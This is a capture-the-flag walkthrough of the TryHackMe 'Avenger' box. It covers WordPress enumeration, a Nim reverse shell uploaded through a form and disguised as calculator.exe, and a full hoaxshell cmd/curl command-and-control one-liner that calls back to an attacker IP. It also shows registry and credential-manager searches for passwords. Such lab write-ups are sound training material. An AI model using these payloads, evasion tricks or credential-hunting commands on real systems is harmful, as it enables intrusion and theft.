TryHackMe Avenger - Walkthrough

Enumeration

After connecting to VPN i got this IP as my target 10.10.159.180, So first thing first (Network Mapper)

 nmap -p- -sV 10.10.159.180 -vv

As the box description indicates You’ve been asked to exploit all the vulnerabilities present. let go for port 80 first.

While enumerating the directory listing, I visited each available path individually. Upon clicking the "Gift" directory, I was redirected to a domain:http://avenger.tryhackme/gift/

This indicated that the IP address is mapped to a custom domain (avenger.tryhackme). To access it properly in the browser, I added the following entry to my /etc/hosts file:

sudo nano /etc/hosts

And now we are able to access the url http://avenger.tryhackme/gift/

I next ran my standard webapp enumeration commands.

dirb http://10.10.159.180/ -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://10.10.159.180 -w /usr/share/wordlists/dirb/common.txt
ffuf -w /usr/share/wordlists/wfuzz/general/big.txt -u http://10.10.159.180/FUZZ -fw 1 (-fw 1 ignores responses with only 1 word (filtering noise).)
nikto -h http://10.10.159.180

I found few things:

The ComputerName seems to be “gift”
Apache/2.4.56 (Win64) with PHP/8.0.28 is running.
Website is running on PHP

This gave me the indication to run wpscan

wpscan --url http://avenger.tryhackme/wordpress/ --enumerate p

Result: 
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

Rerun the scan using token 
wpscan --url http://avenger.tryhackme/wordpress/ --enumerate p --api-token (your_Token)

lets visit this http://avenger.tryhackme/wordpress/wp-content/uploads/

then i tried for default wp-login.php to find a login page

and here we got a login page. where i found a valid username “admin“

This can be a potential entry point for initial Access.

Initial Access

I initially struggled with this part of the challenge — I completely missed that the Forminator plugin was the key to gaining initial access. Since I’m still improving in web app exploitation, I didn't realize the significance of the form embedded at the bottom of the http://avenger.tryhackme/gift page.

After digging deeper (and with help from the hint by andrea526), I understood the trick:
➡️ The Forminator form allows file uploads via an "Attach File" button.
➡️ Behind the scenes, the vulnerable VM simulates a user who opens/clicks any uploaded file.

This behavior can be exploited by uploading a malicious file.

We will use Nim-Reverse-Shell

Nim is a modern, statically-typed programming language that compiles to C, C++, or JavaScript. It's known for:

• High performance like C/C++

• Easy syntax like Python

• Low antivirus detection (why attackers/red teamers use it)

first we need to setup Nim and mingw-w64

apt install mingw-w64 
apt install nim

Steps to setup Nim

curl https://nim-lang.org/choosenim/init.sh -sSf | sh

Check Your Current Shell 
Step 1: Check Your Current Shell
echo $SHELL
If it shows something like /bin/zsh, you're using zsh.

Step 2: Edit the Right Shell File
nano ~/.zshrc
export PATH=/root/.nimble/bin:$PATH
save at the end

Step 3: Reload the Shell Config
source ~/.zshrc
nim -v

Download this file rev-shell.nim

compiles the reverse_shell.nim Nim source file into a Windows executable named rev_shell.exe.
The -o: flag specifies the output filename. Quotation marks are used to avoid shell parsing issues.

Now upload this to the target and make sure the listener is running on the given port.

nim c -d:mingw --app:gui -d:release "-o:rev_shell.exe" reverse_shell.nim

This command compiles reverse_shell.nim into a Windows GUI executable named rev_shell.exe with optimizations for speed and no console window.

Let's rename rev_shell.exe to something more innocuous (e.g., calculator.exe) to help evade detection by security tools before uploading it to the target.

Now time to upload and wait for the shell.

Our listener is waiting on 443

as we are hugo now lets navigate to the user.txt our first flag

Finding the “root” flag

lets first enumerate our initial access

That is something according to me is our next flag resides. Currently no access.

Lets take Hoaxshell is a powerful and stealthy Windows reverse shell framework written in Python. It is designed for post-exploitation and red teaming tasks, especially in environments where traditional reverse shells may get detected or blocked.

Steps to setup Hoaxshell

git clone https://github.com/t3l3machus/hoaxshell.git
cd hoaxshell
pip3 install -r requirements.txt
python3 -m venv hoaxenv
source hoaxenv/bin/activate                                                                                                                           
┌──(hoaxenv)─(root㉿kali)-[~/Desktop/thm/hoaxshell]
└─# pip install -r requirements.txt

Download the hoaxshell-listener.py as show.

python3 hoaxshell-listener.py -t cmd-curl -p 8080

@echo off&cmd /V:ON /C "SET ip=10.17.7.239:8080&&SET sid="Authorization: eb6a44aa-8acc1e56-629ea455"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1" > NUL

Run this code on the victim cmd which we got in the past.

Have a look at hoaxshell-listener

Why We Used Hoaxshell Instead of a Normal Reverse Shell we got?

We used Hoaxshell instead of a normal reverse shell because it is stealthier, harder to detect, and better suited for bypassing antivirus and EDR solutions. While normal shells (like Netcat or Meterpreter) create noisy, suspicious traffic that security tools can easily flag, Hoaxshell uses HTTP/S-based communication, making it look like regular web traffic. It's also fileless, runs entirely in memory using PowerShell, and can maintain longer persistence without raising alerts. In short, Hoaxshell helps achieve more stable and covert access to the target system.

Example below i am access Program files below using normal reverse shell we got.

Accessible in hoaxshell

In your normal reverse shell (e.g., Netcat or raw Nim reverse shell), the command parsing and execution is very basic. Quoted paths like "Program Files" may not be correctly parsed or escaped. So, it ends up treating the space in "Program Files" as a command separator — causing a syntax error like:

OSError: The filename, directory name, or volume label syntax is incorrect.

This happens because most simple reverse shells just pass raw input to cmd.exe without proper escaping.

Why it worked in Hoaxshell?

Hoaxshell:

• Uses PowerShell-based command execution, which handles quoted strings and complex commands more gracefully.

• It maintains better input/output encoding, including whitespace and special characters.

• It simulates an interactive shell-like experience, where commands like cd "Program Files" are interpreted just like in a normal command prompt.

lets enumerate now more

And i found some credentials.

Another juicy stuff

C:\xampp\htdocs\gift> cmdkey /list

#Lists saved credentials (Windows Credential Manager) for remote desktop, network shares, or websites.

C:\xampp\htdocs\gift> reg query HKLM /f password /t REG_SZ /s

#Searches the HKEY_LOCAL_MACHINE registry hive for values containing the string "password", specifically of type REG_SZ (string), recursively.

And look what i found

Lets use remmina to take remote access.

And yes we have a better foothold now

As soon as got RDP access i simply tried open Powershell as an administrator and it work.

Ideally i missed one enumeration which is checking the user privileges

hugo is already in the administrator group.

Navigating to my root.txt flag

Skills Practiced:
Web enumeration, WordPress plugin exploitation, file upload abuse, Nim malware compilation, reverse shell handling (Nim & Hoaxshell), Windows enumeration, RDP post-exploitation.